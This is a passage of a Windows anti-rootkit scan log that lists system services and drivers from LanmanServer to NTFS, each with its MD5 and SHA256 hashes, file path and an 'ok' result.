21:27:05.0891 0x0ce4  [ 0DD3C5101AE1AA7E28B4CE5AB190C261, FAFFE2102972798210ED5E766F54C5EED6262354E132E1C24539DAA598895608 ] LanmanServer    C:\WINDOWS\system32\srvsvc.dll
21:27:05.0906 0x0ce4  LanmanServer - ok
21:27:05.0912 0x0ce4  [ B82D6C634638534E41748FCEC909E55D, C286EB7B3E780549F77E75B4B9F053861D82EFDCD43B1308848A08D23EFADDCA ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
21:27:05.0926 0x0ce4  LanmanWorkstation - ok
21:27:05.0930 0x0ce4  [ AF1077E89AD4458EC9B1CABB35595346, 762AE3218B7B05032C4199F0AE9ABCC822C3DF88BBB09536202B6B26A7944024 ] lfsvc           C:\WINDOWS\System32\lfsvc.dll
21:27:05.0938 0x0ce4  lfsvc - ok
21:27:05.0940 0x0ce4  [ C0CB3B9F1F92C36B91309FDACCDF918B, 5D40C11388A48323D9D9AC18A950B09E2654092BC2F9DE45779A9354668BA18E ] LicenseManager  C:\WINDOWS\system32\LicenseManagerSvc.dll
21:27:05.0948 0x0ce4  LicenseManager - ok
21:27:05.0951 0x0ce4  [ FC37745959DFA4871759E4DCC836227A, 8B63F798440FD0A34E2F2940B2598238BC852EF3EFD22147A77AB4BA6FB9E704 ] lltdio          C:\WINDOWS\system32\drivers\lltdio.sys
21:27:05.0964 0x0ce4  lltdio - ok
21:27:05.0970 0x0ce4  [ 1797F544956D46966C67A2F7879403A9, D7820D2F8E936FF13D709BA1BD0541AABA8402F38698FE96DAE70B4E7A730835 ] lltdsvc         C:\WINDOWS\System32\lltdsvc.dll
21:27:05.0988 0x0ce4  lltdsvc - ok
21:27:05.0991 0x0ce4  [ AE561CB0813D4DFA7D3E4471B2B70F5F, 344EA5E02D04098F032353962C1B70B0F578BCCD2843C70D6330B3F967D2FDB5 ] lmhosts         C:\WINDOWS\System32\lmhsvc.dll
21:27:06.0000 0x0ce4  lmhosts - ok
21:27:06.0007 0x0ce4  [ 3DE66F47365AA8CEB18B1EE272F4FEBA, 8DDD6AB4AEDE3B2FEA0D3B63DD24E3F3422D6ADE067756A3919FCED53C349167 ] LMS             C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
21:27:06.0017 0x0ce4  LMS - ok
21:27:06.0022 0x0ce4  [ 16C9D4D822CCA795A72DC88B25A577CC, AEF93AA4E815F90C1A42D574C6DE7EF31FE69AD7B78B8E1AC7C27304F3CD7959 ] LSI_SAS         C:\WINDOWS\system32\drivers\lsi_sas.sys
21:27:06.0028 0x0ce4  LSI_SAS - ok
21:27:06.0032 0x0ce4  [ 920F0CFCED5F28A31B79F1C470649D11, 5A5F390F2FD7C26807E7896E9F8F94EE7E69FE3C4B247BEA515588EB076148EF ] LSI_SAS2i       C:\WINDOWS\system32\drivers\lsi_sas2i.sys
21:27:06.0039 0x0ce4  LSI_SAS2i - ok
21:27:06.0043 0x0ce4  [ 0FE63316F1C70A0F759A449FAC64C24B, CF99D62FDA862095BA1EB57DD58CEC070E0552E15B6F454B87D593707132636B ] LSI_SAS3i       C:\WINDOWS\system32\drivers\lsi_sas3i.sys
21:27:06.0050 0x0ce4  LSI_SAS3i - ok
21:27:06.0053 0x0ce4  [ 80E82C46B27A923A3744531069B63857, C73A200FC2A009D19F2C26FAC07489EA0F4329CD7A1D80EB3200B19DFC883F8D ] LSI_SSS         C:\WINDOWS\system32\drivers\lsi_sss.sys
21:27:06.0060 0x0ce4  LSI_SSS - ok
21:27:06.0072 0x0ce4  [ A69A59CD52D26443FF728FD52283598C, E416481B23CDADBB9E608E49C9DC9A520D14935E92CA9B63E7763692DB382D7D ] LSM             C:\WINDOWS\System32\lsm.dll
21:27:06.0093 0x0ce4  LSM - ok
21:27:06.0097 0x0ce4  [ 88F5570C04766EE561FF129B2F93030C, A36F7FF563F813EC0F69E5BFB76C58A1C9824F54BA1729C4096E8B7B7C8D90EC ] luafv           C:\WINDOWS\system32\drivers\luafv.sys
21:27:06.0108 0x0ce4  luafv - ok
21:27:06.0112 0x0ce4  [ D365217A6D4528ABB41B40C8FBD227E8, 340129785A5788A8FFE0E1B339A616D290F7504F3658F63E1A3B169B38460FBF ] MapsBroker      C:\WINDOWS\System32\moshost.dll
21:27:06.0122 0x0ce4  MapsBroker - ok
21:27:06.0130 0x0ce4  [ C3EED732789052C98A2613A7E1C37CDA, D71735C8FB772EEB7F3F304CD79D8D774A9A285A94365DE0E635F61357EC9F0F ] mausbhost       C:\WINDOWS\System32\drivers\mausbhost.sys
21:27:06.0141 0x0ce4  mausbhost - ok
21:27:06.0144 0x0ce4  [ 4DCE65116A28488593FF5A6A18B03DB0, AAFA7E7C1C9A38B8CF5CE530F96028191F52B1FDD2790246E413B63CF7C5F02A ] mausbip         C:\WINDOWS\System32\drivers\mausbip.sys
21:27:06.0150 0x0ce4  mausbip - ok
21:27:06.0153 0x0ce4  [ 0609BF877A2F4DEECC62EEE220AB6242, 393268836EB055669997BD05866487497AFC396C9516DA4C4F143679B1DDCA6E ] megasas         C:\WINDOWS\system32\drivers\megasas.sys
21:27:06.0160 0x0ce4  megasas - ok
21:27:06.0163 0x0ce4  [ EEC64C8D498D121607C7615FDFBEE4D0, B605B9886C1A05C999B005AEA6D0677DF632E2F34F4FF03F09C2E6C05F554D50 ] megasas2i       C:\WINDOWS\system32\drivers\MegaSas2i.sys
21:27:06.0169 0x0ce4  megasas2i - ok
21:27:06.0179 0x0ce4  [ 2B7D3B206833D769218A1F4BE2D73B97, 25901A5E931DC3659993448E59ABC3601B7B0ED9AFEF0F5ECC139D0D0442F73B ] megasr          C:\WINDOWS\system32\drivers\megasr.sys
21:27:06.0193 0x0ce4  megasr - ok
21:27:06.0198 0x0ce4  [ E0EF6C1399A9B1AAA0B28590411BED04, 10C193D1ED434A6DC2AD8C450012B9AF1C848A0A0B3B775F13495648FB77E009 ] MEIx64          C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys
21:27:06.0204 0x0ce4  MEIx64 - ok
21:27:06.0207 0x0ce4  [ 4F708DA590EDBCC124FB79066D44759B, B8DA803299AF5FDE1594CF958EA6B99D4B99E8163438A70A692CA33A96DBF8DE ] MessagingService C:\WINDOWS\System32\MessagingService.dll
21:27:06.0216 0x0ce4  MessagingService - ok
21:27:06.0231 0x0ce4  [ 89257B8D3826B5629CF7F73F97DA44F9, F056D67EC82072BA209FF7942862862FDF562F8C038F3128861C387F8F63B494 ] mlx4_bus        C:\WINDOWS\System32\drivers\mlx4_bus.sys
21:27:06.0249 0x0ce4  mlx4_bus - ok
21:27:06.0253 0x0ce4  [ 9AE3C0CC0865B1618A3C97744A6A9E9B, BF72AEF0360AC278B36ED31E5BFC2E8F72136B0952490A105CB6929654C97F6C ] MMCSS           C:\WINDOWS\system32\drivers\mmcss.sys
21:27:06.0261 0x0ce4  MMCSS - ok
21:27:06.0264 0x0ce4  [ 0CD29540C32C2E2E0E3D7E9832752AF3, E64C3F5323C59D53409E33E88989FDD2A38B5B602336FC1D8C3702CA9B5EBFC7 ] Modem           C:\WINDOWS\system32\drivers\modem.sys
21:27:06.0272 0x0ce4  Modem - ok
21:27:06.0275 0x0ce4  [ 534477FCAFDFCA6B841BFA06BD26BCC5, 96404FDF0BA2127A3BD24319637EC0C8BE8C42618D9FEDF66F41C5F72840D427 ] monitor         C:\WINDOWS\System32\drivers\monitor.sys
21:27:06.0282 0x0ce4  monitor - ok
21:27:06.0286 0x0ce4  [ F5D4E18A70BA069D479154442CDEB60D, 96345E88BC6A50415E112A4B4CFDF3F4306EA049741C5B0A2BFFC142F15EB5CB ] mouclass        C:\WINDOWS\System32\drivers\mouclass.sys
21:27:06.0291 0x0ce4  mouclass - ok
21:27:06.0294 0x0ce4  [ 5C09868963B0C076AC3BC7759A46B7B1, 64CD200A8D90CDC31317009636A3BB6574ABF04BCAC903F93C47823C40CC03F6 ] mouhid          C:\WINDOWS\System32\drivers\mouhid.sys
21:27:06.0302 0x0ce4  mouhid - ok
21:27:06.0306 0x0ce4  [ 8BF7039787036529B98E50AE86A0E46B, 69C04D012D026A14E2D2A138EDA79227F9BE4BE1892D517DCDB797F2A5AEDB14 ] mountmgr        C:\WINDOWS\system32\drivers\mountmgr.sys
21:27:06.0312 0x0ce4  mountmgr - ok
21:27:06.0317 0x0ce4  [ 260DB638038D0D9ACCBFCA9F2BF9B692, 68B9454D1E10A5A710AA3F823C7EAF2E8F3DDF5534262AC289BF454FC829B0B7 ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
21:27:06.0324 0x0ce4  MozillaMaintenance - ok
21:27:06.0328 0x0ce4  [ AD118EC95E9EF4D5223D681D8F183567, 395B76626956F5B7992676B9CA57B2CA075F0CDA881E14B3ED07ABE2DC0EEDBC ] mpsdrv          C:\WINDOWS\system32\drivers\mpsdrv.sys
21:27:06.0335 0x0ce4  mpsdrv - ok
21:27:06.0351 0x0ce4  [ FA53A01517BBA97EA3B71CF5CC2052F4, C6F7CBDFAD629B2D4B6ED6A471708E8DBEB5CD5E0A992848359D3C0A82FDFCBE ] MpsSvc          C:\WINDOWS\system32\mpssvc.dll
21:27:06.0378 0x0ce4  MpsSvc - ok
21:27:06.0384 0x0ce4  [ D14C297933C82B8CB0B5CBBA4DDC830B, 2EF356F5373F16A7AE2421187FC5C150C09452C835229275B7403181D65C210F ] MRxDAV          C:\WINDOWS\system32\drivers\mrxdav.sys
21:27:06.0395 0x0ce4  MRxDAV - ok
21:27:06.0404 0x0ce4  [ F2AD1B72C5A6475FB5FF332E1980DF88, 41E24496FBD61C0A333F567DA7C4E38C5A792724FB56448189099F60114749D5 ] mrxsmb          C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
21:27:06.0416 0x0ce4  mrxsmb - ok
21:27:06.0423 0x0ce4  [ 469DD958B1D8CB09E38BE2298B8C398D, 97CCEFF58D8865B0D27C4E16B082C20FA5279CF01A37F47B5F2DA39B334F0667 ] mrxsmb10        C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
21:27:06.0434 0x0ce4  mrxsmb10 - ok
21:27:06.0440 0x0ce4  [ 1FC4802B593494746B6FE3BDAC25E371, 774CC950B46B3E32603D368D9938BFCF60D2BB3C14C3FE8B03CB1E724AAC29EF ] mrxsmb20        C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
21:27:06.0449 0x0ce4  mrxsmb20 - ok
21:27:06.0453 0x0ce4  [ BD12E1941A87671A767447B02C6A51A1, 7FCB3077E827639CE23CC2C6FE997A33F7A702D266C0277AF01453B5ACC0966D ] MsBridge        C:\WINDOWS\system32\drivers\bridge.sys
21:27:06.0462 0x0ce4  MsBridge - ok
21:27:06.0467 0x0ce4  [ 41C5D9B52F4A1B30C3F7219D601CF12C, E1C1B1CED19D32FA1B765C7C380B9E749893B2018CF358F448E40DA60CB63166 ] MSDTC           C:\WINDOWS\System32\msdtc.exe
21:27:06.0478 0x0ce4  MSDTC - ok
21:27:06.0482 0x0ce4  [ 92C00BD9616F353CA59A755C33269757, E67F05A4A1C44137CCAC0C7292A7010B5920172ACAE32638600E231F28F33035 ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
21:27:06.0489 0x0ce4  Msfs - ok
21:27:06.0492 0x0ce4  [ F27EC8F7A0A779276E5DA2E70C2B01EE, A450DB309F84CAFFCE2A720612BDB260D88E9C390D2BC60874D73A55D8567E04 ] msgpiowin32     C:\WINDOWS\System32\drivers\msgpiowin32.sys
21:27:06.0498 0x0ce4  msgpiowin32 - ok
21:27:06.0501 0x0ce4  [ CBA955A54C9446CAAD28C76789D3B071, F6CA1BECA35B13B7CCC9FFB325FACF22713F6B81E8A6540C9967A462E425BBEC ] mshidkmdf       C:\WINDOWS\System32\drivers\mshidkmdf.sys
21:27:06.0507 0x0ce4  mshidkmdf - ok
21:27:06.0510 0x0ce4  [ E8E568EF60677E4534F387C53EE1B35F, 2E250EE1A9AE8AFDCA5216BED87328B05713386BD7E61C66A74EF021F2AFE7D7 ] mshidumdf       C:\WINDOWS\System32\drivers\mshidumdf.sys
21:27:06.0516 0x0ce4  mshidumdf - ok
21:27:06.0520 0x0ce4  [ 16376B7B0730C04DD1A2C0CC8E09E420, 2F39D3254FD272E277B5496A8C93A7CBFBF80F6004AE0343BE9F09C538975910 ] msisadrv        C:\WINDOWS\system32\drivers\msisadrv.sys
21:27:06.0525 0x0ce4  msisadrv - ok
21:27:06.0530 0x0ce4  [ 75FE54E84C1EB0C9C5E09F9FD5928ECC, 971CFEE8FB8364D17CD392E32A32AE57BE6461EAB6C580B52E6D752D4CFDD6B3 ] MSiSCSI         C:\WINDOWS\system32\iscsiexe.dll
21:27:06.0540 0x0ce4  MSiSCSI - ok
21:27:06.0542 0x0ce4  msiserver - ok
21:27:06.0545 0x0ce4  [ B26E1C10C8323D2B6ADAF504CD487757, 758DBCDA43D62547ED274D2E09A66B266470C86A89A3BEF387E535DB37A7EA44 ] MSKSSRV         C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys
21:27:06.0558 0x0ce4  MSKSSRV - ok
21:27:06.0562 0x0ce4  [ E40B960078A15D4901265D32E071C42D, AC11B8221C8F529FE3CA6FEB99AF699664C86008A732C3A8E6B1CE31C2272454 ] MsLldp          C:\WINDOWS\system32\drivers\mslldp.sys
21:27:06.0570 0x0ce4  MsLldp - ok
21:27:06.0573 0x0ce4  [ B4860AB91DC4E73936F0FF504D6B4B07, 7371093D9EB62218D20F6B8B3C88CBF01932AEA2923ED119962A78BE46E5A939 ] MSPCLOCK        C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys
21:27:06.0586 0x0ce4  MSPCLOCK - ok
21:27:06.0589 0x0ce4  [ 8EDC45C3F7F64A51C98B59E24648F74B, 445731F32A37A99FAB3CD5D178A84FB4F835727826211FF18623409D29FF3A1A ] MSPQM           C:\WINDOWS\system32\DRIVERS\MSPQM.sys
21:27:06.0602 0x0ce4  MSPQM - ok
21:27:06.0609 0x0ce4  [ 7DA5FAC2A49D30CA5B7B96B8B26281AC, 168C3AA5C7318184D8F67EA832920FCE64E11D4CC418517D7BDACB9632F0BEA8 ] MsRPC           C:\WINDOWS\system32\drivers\MsRPC.sys
21:27:06.0620 0x0ce4  MsRPC - ok
21:27:06.0626 0x0ce4  [ 4369BBFCDDCCE61856DD862C8E5C4E19, 23BA06675997A3A46723D0FC9E3DFEBC17E4149FC67B9DCED3011BBB5B5DCFF9 ] MsSecFlt        C:\WINDOWS\system32\drivers\mssecflt.sys
21:27:06.0635 0x0ce4  MsSecFlt - ok
21:27:06.0638 0x0ce4  [ 7E3365C8BC83DCE88D6226BB5C7170C4, 69D741039CAAFCA93A4CC09CEC14F117527D732A6CF3077AA83E935B03EC3F9C ] mssmbios        C:\WINDOWS\System32\drivers\mssmbios.sys
21:27:06.0644 0x0ce4  mssmbios - ok
21:27:06.0646 0x0ce4  [ 09D51564E49181E9928910D6B91C920E, FB3C918820ACF4506AC49478709B4D4C6489BA0B5113E666C34B916CA5CD6DE7 ] MSTEE           C:\WINDOWS\system32\DRIVERS\MSTEE.sys
21:27:06.0660 0x0ce4  MSTEE - ok
21:27:06.0662 0x0ce4  [ 793AE56A3946EAD5F906C28D294FEFE6, BB563D088084026606C2FBD30A0850BA18363CC173CC6C77272D727CA6C1F9BD ] MTConfig        C:\WINDOWS\System32\drivers\MTConfig.sys
21:27:06.0669 0x0ce4  MTConfig - ok
21:27:06.0674 0x0ce4  [ E35F51C7474A26680627477462715206, 435490915CDD416D666B64C6B4526285EC946E6918CFA85585692B9ED43518B6 ] Mup             C:\WINDOWS\system32\Drivers\mup.sys
21:27:06.0681 0x0ce4  Mup - ok
21:27:06.0684 0x0ce4  [ 74BD1149BF50F1E24934042A3BD17C90, DC4626DC4D629CA7DF336EC7E6435F27D2E252D81945E57F4BF2C981DBCD9B45 ] mvumis          C:\WINDOWS\system32\drivers\mvumis.sys
21:27:06.0690 0x0ce4  mvumis - ok
21:27:06.0701 0x0ce4  [ 39C772E20B8C61858F969E4D60699D89, 32146D265CD315597C48FB233D77DDACB0FEDDB7E800A0F411A67844BB3ACC67 ] NativeWifiP     C:\WINDOWS\system32\DRIVERS\nwifi.sys
21:27:06.0726 0x0ce4  NativeWifiP - ok
21:27:06.0739 0x0ce4  [ BC80F85C129F12A5F64D6741A120B539, AD410F13BCBDE54F98E353BD4DAF30CC5A0A9990FC4F1AB3623EF3175EEBCAF7 ] NaturalAuthentication C:\WINDOWS\System32\NaturalAuth.dll
21:27:06.0767 0x0ce4  NaturalAuthentication - ok
21:27:06.0772 0x0ce4  [ F2EA6F3165E154C24C084AC35DD6C3F8, 4F8CB75770945F5A28CC308917A124109F7462CE933695B9CAA3FE2CAE76C445 ] NcaSvc          C:\WINDOWS\System32\ncasvc.dll
21:27:06.0783 0x0ce4  NcaSvc - ok
21:27:06.0790 0x0ce4  [ 9B3C6582CFB91BA2A04B1D06D8E2FB98, 431E6B075FD24002724E8A2ED9FB3221AD66D1F1D021B56466187D97E5B43A1F ] NcbService      C:\WINDOWS\System32\ncbservice.dll
21:27:06.0804 0x0ce4  NcbService - ok
21:27:06.0808 0x0ce4  [ 932E2E43078A3D786A46A5428F21B314, 17F1CC3388D80F1E1850063114C1EB72EEA149D9C8FA3501C0F9EB55C9E0C58D ] NcdAutoSetup    C:\WINDOWS\System32\NcdAutoSetup.dll
21:27:06.0820 0x0ce4  NcdAutoSetup - ok
21:27:06.0824 0x0ce4  [ 0FFE8AF1B94C5FD54E6ACC6DAE990D31, B67D3CA3460D4700D8B83EFE4B6A7AA940650E84D985484FBAA1EE80F3632133 ] ndfltr          C:\WINDOWS\System32\drivers\ndfltr.sys
21:27:06.0831 0x0ce4  ndfltr - ok
21:27:06.0850 0x0ce4  [ E27876B335FEB441DA511030AA85624D, 6B4FA08463166A2B32F317E6FEDE3C22EB8FFA5B2077955A0B2F2184858BDDE7 ] NDIS            C:\WINDOWS\system32\drivers\ndis.sys
21:27:06.0875 0x0ce4  NDIS - ok
21:27:06.0879 0x0ce4  [ 4EA73CFDEE4A628D387D95464A131F29, 38A6E2389FA9B20A7AFDF3CFCD13B66489B92D853EE486BF81019F0A36A142E1 ] NdisCap         C:\WINDOWS\system32\drivers\ndiscap.sys
21:27:06.0892 0x0ce4  NdisCap - ok
21:27:06.0897 0x0ce4  [ EB127689AF6F24091AB73538A556257F, BC25067D355084D6893E9262750433044C28893BB27A67BF7AF5008742C6D359 ] NdisImPlatform  C:\WINDOWS\system32\drivers\NdisImPlatform.sys
21:27:06.0911 0x0ce4  NdisImPlatform - ok
21:27:06.0914 0x0ce4  [ 73B4C72FB6170A08C64BDA92DE93ECF7, 766BBE659232F0F5EAEE577EE88091FB76175BC52D65B9637126069C97E795D4 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
21:27:06.0928 0x0ce4  NdisTapi - ok
21:27:06.0931 0x0ce4  [ 6704F27EB15A5B30AA7FA5A4F4D1FD47, 841F99B3C751F4D4E23C0E7B5C275B4871C1D5EF937A93129DF64DF49F6B6736 ] Ndisuio         C:\WINDOWS\system32\drivers\ndisuio.sys
21:27:06.0938 0x0ce4  Ndisuio - ok
21:27:06.0941 0x0ce4  [ FE87CCAA89433FC306A80F15E848F4B2, 3269FDF53DA59057E066D582FCBB96B71C8063B8F488856A9DEA414B4797E43A ] NdisVirtualBus  C:\WINDOWS\System32\drivers\NdisVirtualBus.sys
21:27:06.0949 0x0ce4  NdisVirtualBus - ok
21:27:06.0954 0x0ce4  [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] NdisWan         C:\WINDOWS\System32\drivers\ndiswan.sys
21:27:06.0971 0x0ce4  NdisWan - ok
21:27:06.0977 0x0ce4  [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] ndiswanlegacy   C:\WINDOWS\system32\DRIVERS\ndiswan.sys
21:27:06.0994 0x0ce4  ndiswanlegacy - ok
21:27:06.0997 0x0ce4  [ AC6AC99075732F5C29DB0004DD5B1AC6, 684EC821EF5C60DA540CA36EC192B09E62440AAD5B13F0F4C23DDC4A9B96F28C ] ndproxy         C:\WINDOWS\system32\DRIVERS\NDProxy.sys
21:27:07.0012 0x0ce4  ndproxy - ok
21:27:07.0016 0x0ce4  [ 9AC090451D92E6081EB89CDA83D74189, D4D442412F112853AA8D88DFB5F695AE4E8E2C361905992537EE53BE675FECE8 ] Ndu             C:\WINDOWS\system32\drivers\Ndu.sys
21:27:07.0032 0x0ce4  Ndu - ok
21:27:07.0036 0x0ce4  [ A115DDB2C7805C41EEC9A5276FF5764E, FC81D0BE2DAAC6E7161C0FC5C90050022A39AD50E28040D5357C0E1FD6C0B6B5 ] NetAdapterCx    C:\WINDOWS\system32\drivers\NetAdapterCx.sys
21:27:07.0045 0x0ce4  NetAdapterCx - ok
21:27:07.0049 0x0ce4  [ F420B6CAB5151A38E4DBBFFB500C11DA, 271F495B261461B8EA847BFDD87C155E6DC1B6236C161B8253A1F023706B1B1D ] NetBIOS         C:\WINDOWS\system32\drivers\netbios.sys
21:27:07.0055 0x0ce4  NetBIOS - ok
21:27:07.0062 0x0ce4  [ 30C2F67EC84EB11B22011620107E0325, 98088685F457566FD8D13B83A0BF6B06CDC70AC156B67BF87A8A8446C150C1F3 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
21:27:07.0076 0x0ce4  NetBT - ok
21:27:07.0079 0x0ce4  [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] Netlogon        C:\WINDOWS\system32\lsass.exe
21:27:07.0086 0x0ce4  Netlogon - ok
21:27:07.0092 0x0ce4  [ D9FF8CA42C3541F4840693F17143C595, B05FB0B6439B34BD93EE59DC48BBE3D712A7428EFBFE37A887CE8546E57EE68F ] Netman          C:\WINDOWS\System32\netman.dll
21:27:07.0105 0x0ce4  Netman - ok
21:27:07.0114 0x0ce4  [ 96173660A4DD4A56E4B8938A67DAD9B7, F1D8F94625C6461DB89F8D3BDC73748F8A7F3446694BD1F148AF9BE6F17E9543 ] netprofm        C:\WINDOWS\System32\netprofmsvc.dll
21:27:07.0137 0x0ce4  netprofm - ok
21:27:07.0143 0x0ce4  [ 79C810D49E6D2825F51B0D7CAA6E2FAD, 19B7FB87FC8CE8FEA456F06D32099ED5B69FE38D2954580D4CEC32998D206E9F ] NetSetupSvc     C:\WINDOWS\System32\NetSetupSvc.dll
21:27:07.0156 0x0ce4  NetSetupSvc - ok
21:27:07.0162 0x0ce4  [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:27:07.0169 0x0ce4  NetTcpPortSharing - ok
21:27:07.0173 0x0ce4  [ 8C03F2F5A9E93AEB08B3AEE51552394A, F95185FB8D5FDEAB39E593488BA6ABCFA9C081BFED05008E0CD95F29B894AFC8 ] netvsc          C:\WINDOWS\System32\drivers\netvsc.sys
21:27:07.0181 0x0ce4  netvsc - ok
21:27:07.0191 0x0ce4  [ 0C124EAC0EF7B3767280C94A8C03615B, D10216726A221C8FBC67C47F4B266C271A7C7A4438F77AC44BB561E0A6EB6D34 ] NgcCtnrSvc      C:\WINDOWS\System32\NgcCtnrSvc.dll
21:27:07.0209 0x0ce4  NgcCtnrSvc - ok
21:27:07.0225 0x0ce4  [ 6A3DA98447EF49AEB7931ECFBA51AFAD, 9F8E7313E6FD1F46AF22C9C58C877869E73848F459A73F16E0A6AC261BC483DE ] NgcSvc          C:\WINDOWS\system32\ngcsvc.dll
21:27:07.0253 0x0ce4  NgcSvc - ok
21:27:07.0261 0x0ce4  [ 50F98CD010326B58F09082BACF3123AE, 124446A2905E23BB3F5763E347842F3F511EC44C37C2F85E409F73EC8F53924E ] NlaSvc          C:\WINDOWS\System32\nlasvc.dll
21:27:07.0281 0x0ce4  NlaSvc - ok
21:27:07.0286 0x0ce4  [ EF729C076C2B75B5CB431482DE1E07B3, 834A450F1FDA3615213DC340B5CCFADE326082427CEE3179D32A3C462A1F251F ] NNSALPC         C:\WINDOWS\system32\DRIVERS\NNSALPC.sys
21:27:07.0292 0x0ce4  NNSALPC - ok
21:27:07.0297 0x0ce4  [ 0E6EDE400CDDEE1D76CB6B4EF9076130, 2216F3508F3A59E0FF0844F07EC6413A457BD3370B2AA657D8B6D504EE7B8C21 ] NNSHTTP         C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys
21:27:07.0305 0x0ce4  NNSHTTP - ok
21:27:07.0309 0x0ce4  [ BA0A6276D2DDCE642D4017AC0E014C54, 983E2F8EE5A8732C5849DC887D4670C91F0AC882E128DCA5B1B3F9A071FF2628 ] NNSHTTPS        C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys
21:27:07.0314 0x0ce4  NNSHTTPS - ok
21:27:07.0319 0x0ce4  [ FB1E93069755A75F8F92FEAD94078362, CD9EE8F217408405BCD41DB197A5447AC35A668E11FE6E2DEFA20D082AC3E44E ] NNSIDS          C:\WINDOWS\system32\DRIVERS\NNSIDS.sys
21:27:07.0325 0x0ce4  NNSIDS - ok
21:27:07.0328 0x0ce4  [ E4B9C6200A8A1213FD29FAF3C42F5F22, 32B21D03BAE08418E5E3B41D7A792378F9915A4AE24C9007B5192E98D480C12B ] NNSNAHSL        C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys
21:27:07.0332 0x0ce4  NNSNAHSL - ok
21:27:07.0337 0x0ce4  [ 8EAF0E189340D0AA6E36FD3DBFCA06E6, 8096A89503BC8AD08CD3F197AD6160C8813B8EC115ABE2FFC42E21F415693A43 ] NNSPICC         C:\WINDOWS\system32\DRIVERS\NNSPICC.sys
21:27:07.0342 0x0ce4  NNSPICC - ok
21:27:07.0346 0x0ce4  [ 1AED3FBBFC200384BFDA528E96ACA62F, F3EE27DAFF90376203FB0F1026CF25995026AAD23B624C3075085A1811509A1B ] NNSPIHSW        C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys
21:27:07.0351 0x0ce4  NNSPIHSW - ok
21:27:07.0356 0x0ce4  [ 8E2B94D8ED57BADF66532D48963F5260, A3B928F17726D615080065B3D174438EF989E89693C0C22CDEF902DEE2707047 ] NNSPOP3         C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys
21:27:07.0362 0x0ce4  NNSPOP3 - ok
21:27:07.0369 0x0ce4  [ 51A96D0C6294DE0A44C60173B11B43FD, 5366037D4B8D63C8EF03E3BB68D5FEC04CBB33B5BD10554D8B9533CECCA4753F ] NNSPROT         C:\WINDOWS\system32\DRIVERS\NNSPROT.sys
21:27:07.0377 0x0ce4  NNSPROT - ok
21:27:07.0382 0x0ce4  [ 1203E755CE66B47F981A14D683483A46, 6E84597954A0F0A9A50EFCE0431D0A23790410DDFAEC048B5EC86C0F4137D0A3 ] NNSPRV          C:\WINDOWS\system32\DRIVERS\NNSPRV.sys
21:27:07.0389 0x0ce4  NNSPRV - ok
21:27:07.0393 0x0ce4  [ 73D22EA5489439A77E7AFF1A476AF4D7, 6B07B76EF0AD2C1886E0AD88CA6501A3EBBEC1AABC8F5B6CEC8DA3E8071BE5BC ] NNSSMTP         C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys
21:27:07.0399 0x0ce4  NNSSMTP - ok
21:27:07.0407 0x0ce4  [ FCAA6139267BE6BD579BE63A35D1B09C, 3F023A9C313DE53C9A5425542F4D472C516E4B928EFD33A0118F07149A4643FF ] NNSSTRM         C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys
21:27:07.0415 0x0ce4  NNSSTRM - ok
21:27:07.0419 0x0ce4  [ 7913A4658185DB56594E22F1A418D8DD, C4B4C771763F03ADDCC288EBF24D895AB8590101A722BB6010F88062F1681457 ] NNSTLSC         C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys
21:27:07.0425 0x0ce4  NNSTLSC - ok
21:27:07.0428 0x0ce4  [ 6D8F6A9C53CFB0C49E8251A442B7283F, C3E913E4997C35A9B4C2E613A499F01D15264EAB699B93269B690B2A74A70E9A ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
21:27:07.0437 0x0ce4  Npfs - ok
21:27:07.0439 0x0ce4  [ BABF7E1757D6908941C9F9CBD66A5EF0, 323E743CB26583763A9C5DE64E7E08138CB8D3E2DE0A8BCE9F774E1C7426E7F8 ] npsvctrig       C:\WINDOWS\System32\drivers\npsvctrig.sys
21:27:07.0446 0x0ce4  npsvctrig - ok
21:27:07.0449 0x0ce4  [ A85EB5721C7203AAAAAA04F551960CD9, E61ED728E154799346C749159BFE36FAEB2CE64FC5735F533B910017D66A7EE5 ] nsi             C:\WINDOWS\system32\nsisvc.dll
21:27:07.0457 0x0ce4  nsi - ok
21:27:07.0460 0x0ce4  [ 7A6BA778B48DF9FB7AC231D4FF6E3248, 5959CA59C75D2C4DD8A539CAA8D99EF6A0CB5AA3F0D485B14C8B35911748F1F7 ] nsiproxy        C:\WINDOWS\system32\drivers\nsiproxy.sys
21:27:07.0467 0x0ce4  nsiproxy - ok
21:27:07.0501 0x0ce4  [ 731FD52461C8107E5B19B9AEDBB82BFB, 51B6722B9B2863B4AE23CE6B1DBD8481DA341748196BD482C6C5F4A6959F24F9 ] NTFS            C:\WINDOWS\system32\drivers\NTFS.sys
21:27:07.0542 0x0ce4  NTFS - ok
